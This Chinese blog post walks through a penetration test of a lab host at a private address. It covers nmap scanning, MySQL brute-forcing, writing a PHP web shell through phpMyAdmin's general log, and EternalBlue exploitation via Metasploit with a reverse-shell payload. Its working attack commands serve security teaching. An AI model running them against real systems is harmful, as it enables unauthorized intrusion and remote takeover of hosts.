发布于2022年11月4日3年前 Nmap这个神器在渗透测试中是必不可少的。从信息收集到拿shell。有时候还真少不了它!本文将要介绍nmap在渗透测试中,都有那些运用和攻击手段。一:利用nmap对目标进行信息收集命令如下:nmap -T4 -A 192.168.123.239从上图我们发现,目标是一台windows系统,并且开启了常见的80 445 3306等常见的端口。二:对目标站点进行扫描命令如下:dirb http://192.168.123.239通过对目标站点分析,我们发现了一些敏感的文件目录。phpMyAdmin include等等。在第一步中,我们扫描到了3306端口,这也意味着目标可以远程登录数据库。三:利用nmap暴力破解mysql命令如下:nmap -p 3306 --script=mysql-brute.nse 192.168.123.239如上,通过暴力破解,我们得到了账号和密码为root和123456四:尝试远程登录命令如下:mysql -h 192.168.123.239 -u root -p成功登录数据库利用phpMyAdmin拿shell在前期的文章中提到过,我们先登录到phpMyAdin执行下面的sql语句SET GLOBAL GENERAL_log='on'; SET GLOBAL GENERAL_log_file='D:/phpstudy_pro/WWW/cmd.php'; SELECT '<?php phpinfo(); ?>';需要注意的是,一定要写对目标的站点根目录的绝对地址执行完成后,会在更目录生成一个cmd.php文件,我们访问效果如下:利用此种方式,便可成功拿shell。五:利用nmap扫描目标主机漏洞命令如下:nmap -v --script=smb-vuln-*.nse --script-args=unsafe=1 ip -Pn扫描结果如下:可以看到,目标存在ms17-010 ms10-054 CVE-2017-0143等漏洞。六:配合msfconsole那些系统权限命令如下:use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.123.66 set payload windows/x64/meterpreter/reverse_tcp exploti通过上诉示例,我们利用nmap从简单的信息收集到拿shell。一次完整的渗透测试就完成了。 版权属于:逍遥子大表哥本文链接:https://blog.bbskali.cn/2101.html按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
创建帐户或登录后发表意见